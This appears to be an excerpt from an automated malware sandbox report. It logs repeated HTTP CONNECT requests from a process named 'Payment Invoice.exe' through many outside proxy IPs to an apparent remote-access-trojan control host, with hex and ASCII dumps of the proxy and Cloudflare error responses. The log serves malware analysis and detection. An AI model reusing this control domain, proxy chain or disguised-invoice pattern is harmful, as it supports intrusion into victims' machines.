                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1560192.168.2.45262885.239.121.16841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.438057899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1561192.168.2.45471465.109.163.154807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.439017057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.089641094 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:28 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1562192.168.2.454709219.243.212.11880807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.439404964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.811865091 CET22INHTTP/1.1 502 ERROR


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1563192.168.2.454695157.185.173.217265897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.440263987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1564192.168.2.449916162.241.46.69537837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.441293955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.589410067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.589638948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.628268957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.777089119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.776720047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.776835918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:33.792378902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:21.901751995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1565192.168.2.454671143.64.8.2180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.446880102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1566192.168.2.452804147.12.46.6231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.450824022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.780368090 CET1254INHTTP/1.1 403 Forbidden
                                                                Server: squid/3.5.28
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 952
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                Content-Language: en
                                                                X-Cache: MISS from ah_test
                                                                Via: 1.1 ah_test (squid/3.5.28)
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d 6f 6e 2c 20 31 31 20 4d 61 72 20 32 30 32 34 20 31 35 3a 31 35 3a 32 31 20 47 4d 54 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Aerohive"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: Web Page Blocked</title><style type="text/css">... body:lang(fa) { direction: rtl; font-size: 100%; font-family: Tahoma, Roya, sans-serif; float: right; }:lang(he) { direction: rtl; } --></style></head><body id="ERR_ACCESS_DENIED"><div id="titles"><h1 style="color: #5b8cbd;">The requested URL cannot be retrieved</h1></div><div id="content"><p>Access to the web page has been blocked in accordance with the network policy. If you believe this is an error, please contact you system administrator.</p><p style="color: #7192b4;">URL: <a href="https://artemis-rat.com/*">https://artemis-rat.com/*</a></p><p style="color: #7192b4;">Category: </p><br></div><div id="footer"><p style="font-size: 12px;">Generated Mon, 11 Mar 2024 15:15:21 GMT</p></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1567192.168.2.45472594.131.14.6610817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.456976891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1568192.168.2.454692103.76.180.10831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.461478949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.248709917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.626662016 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1569192.168.2.454526112.30.155.83127927076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.461478949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.035883904 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1570192.168.2.452856142.54.228.19341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.470248938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1571192.168.2.454829104.17.248.164807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.476779938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.630909920 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1572192.168.2.454755103.166.141.74200747076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.523073912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1573192.168.2.454760190.110.226.162807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.523078918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.323806047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515096903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714519024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.011418104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.323848009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.527331114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.839216948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:03.526772022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1574192.168.2.454841192.154.246.9690007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.542481899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1575192.168.2.454682103.190.54.141807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.562376022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1576192.168.2.45481288.79.243.10331287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.563527107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1577192.168.2.454859104.20.67.113807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.563802004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.723829031 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1578192.168.2.45486045.14.174.180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.564032078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.723885059 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
